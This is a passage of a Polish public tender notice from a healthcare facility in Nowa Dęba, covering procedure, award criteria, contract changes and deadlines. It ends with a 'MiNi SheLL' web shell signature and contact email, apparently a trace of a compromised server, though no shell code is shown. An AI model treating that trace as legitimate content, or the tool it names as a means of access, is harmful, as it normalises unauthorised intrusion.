i)  Pełnomocnictwo  osoby / osób podpisujących ofertę do podejmowania zobowiązań w imieniu Wykonawcy, o ile nie wynikają  z przepisów prawa lub innych dokumentów;
Zamawiający dopuszcza zmianę formy załącznika nr 1 przez Wykonawcę lecz zastrzega,  że  musi zawierać  co do treści wszystkie  dane podane we wzorze do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Umowa, która będzie podpisana w wyniku rozstrzygnięcia niniejszego postępowania o udzielenie zamówienia, będzie zawierała wszystkie zapisy podane we wzorze umowy stanowiącej Załącznik nr 6  do niniejszej specyfikacji,z uwzględnieniem treści ofert. 
2. Zgodnie z art.144 ustawy - Prawo zamówień publicznych , Zamawiający dopuszcza zmianę zawartej umowy w trakcie jej realizacji, w następujących przypadkach:
1) w przypadku obniżenia cen jednostkowych poszczególnych elementów przedmiotu zamówienia korzystniejszą dla Zamawiającego;
2) ilekroć następuje zmiana powszechnie obowiązujących przepisów prawa, w tym zmiana stawki  podatku VAT wówczas cena jednostkowa netto pozostanie bez zmian, natomiast zmianie ulegnie tylko cena jednostkowa brutto ;
3)w zakresie danych identyfikacyjnych strony umowy .
3.W przypadku udokumentowanych zmian, o których mowa w pkt.2  zostaną one uzgodnione i po zaakceptowaniu przez Zamawiającego wprowadzone aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoznowadeba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej, ul.M.C.Skłodowskiej 1A, 39-460 Nowa Dęba pok.111;za zalicz. poczt.przesyłając wniosek z adresem i nr NIP.Cena SIWZ 20,00 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2014 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Nowej Dębie, ul.M.C.Skłodowskiej 1A, 39-460 Nowa Dęba pok.104 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com